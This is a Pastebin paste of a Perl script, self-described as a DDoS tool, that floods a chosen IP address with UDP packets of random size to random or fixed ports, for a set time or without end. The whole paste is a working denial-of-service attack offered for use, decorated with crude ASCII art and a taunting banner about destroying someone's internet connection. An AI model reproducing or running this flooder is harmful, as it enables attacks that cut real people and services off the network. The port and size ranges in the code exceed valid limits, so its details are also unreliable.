xttpx

dick

Dec 7th, 2022 (edited)
84
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 2.56 KB | None | 0 0
  1. #!/usr/bin/perl -w
  2.  
  3. use Socket;
  4. use strict;
  5.  
  6. if ($#ARGV != 3) {
  7.   print " DiCK SCRIPT V2.00 <ip> <port> <size> <time>\n\n";
  8.   print " port=0: use random ports\n";
  9.   print " size=0: use random size between 64 and 65000\n";
  10.   print " time=0: continuous flood\n";
  11.   exit(1);
  12. }
  13. #if(EDITED_DiCK_SCRIPT_DDOS_RUNNING_VPS_SERVER \-f/END SCRIPT
  14. my ($ip,$port,$size,$time) = @ARGV;
  15.  
  16. my ($iaddr,$endtime,$psize,$pport);
  17.  
  18. $iaddr = inet_aton("$ip") or die "Cannot resolve hostname $ip\n";
  19. $endtime = time() + ($time ? $time : 500000000);
  20.  
  21. socket(flood, PF_INET, SOCK_DGRAM, 17);
  22.  
  23. print <<EOTEXT;
  24.                               .
  25.                             _| |_
  26.                           /~     ~\           /)
  27.                         /'         `\      ,/':|
  28.                        (             )    (  :/
  29.                        |  (o ) (o )  |    /\:/'
  30.                        |             |  /'//  
  31.                        |   \_   _/   |/'//'
  32.          _______       |     ~~~    /'//'
  33.         |*   + +|      |       /~\/'//'
  34.         +-------+      |,-----'.////'|
  35.         |#######|     /'    .///''  \ |
  36.         |#######|    (   .///###     )
  37.         |#######|    `\///''##  ,---'|
  38.         |#######|\     |\      /      |
  39.         `~~~~~~~' `~---|-`\__/'      |
  40.                      (~\_           _/~)
  41.                      `\_ ~~-------~~ _/'
  42.  
  43.     TELL EM UR DiCK IS PLAYING-
  44.     SWEET MUSIC BY xttpx TO HIS ROUTER (",)
  45.          
  46. EOTEXT
  47.  
  48. print "DESTROYING SKIDS INTERNET LOL....!
  49. $ip" . ($port ? $port : "random") . " port with " .
  50.   ($size ? "$size-byte" : "random size") . " packets" .
  51.   ($time ? " for $time seconds" : "") . "\n";
  52. print "Break with Ctrl-C\n" unless $time;
  53.  
  54. for (;time() <= $endtime;) {
  55.   $psize = $size ? $size : int(rand(1500000-64)+64) ;
  56.   $pport = $port ? $port : int(rand(1500000))+1;
  57.  
  58.  send(flood, pack("a$psize","saf3e368wumu7repa4uxa2rucHaphubeGamu9R3373af8Us3eTHUgepPTOMqIDxn3t5HYdspEofPneXpPTUE0TBN8oRAp4DjSlhfDAVmfNgbdSbTHWT7Y7gVi6kgrNXKCM64V4kOGvesVr0SZU3k83r6qAr3w4d26kurU9eBRa53cEtRaQaCHEvacu4PETRaf3yepHAk9FAgU2at8GEMEZAwUjaDesTufu2r3DaPhedR7quCru7reketc8atacAStuGeFruNuTHaWuspabr6drARa4r4cApRewuFRaD3qAXAsPeMAChudRUWxuq73R5dra8epre4tasp8craq677wru5asuq3tradede8rethuSwAfespastuduypUt2fudra5utanewrat83rucruyuje6aphuprUWawrawr4tha922HeSpU8acacu5hastuprecevasteberepagas6ejuje2heswugukerebrajeVeswerajAdagecah3phE9EsutaFrU6erathu2u6utraseCrEjehaChuphEchepeswutrezu86pret6afauhgjhgjhgjhgjhgjgubihjbghfhgbjnkncvguihjihijguyyihhfduyhjkjhdcfghnjkjhucdrxcftgfvbhnjiknhcrdcfvghunmjikngdcrftgyvbnjikm","flood"), 0, pack_sockaddr_in($pport, $iaddr));}
Add Comment
Please, Sign In to add comment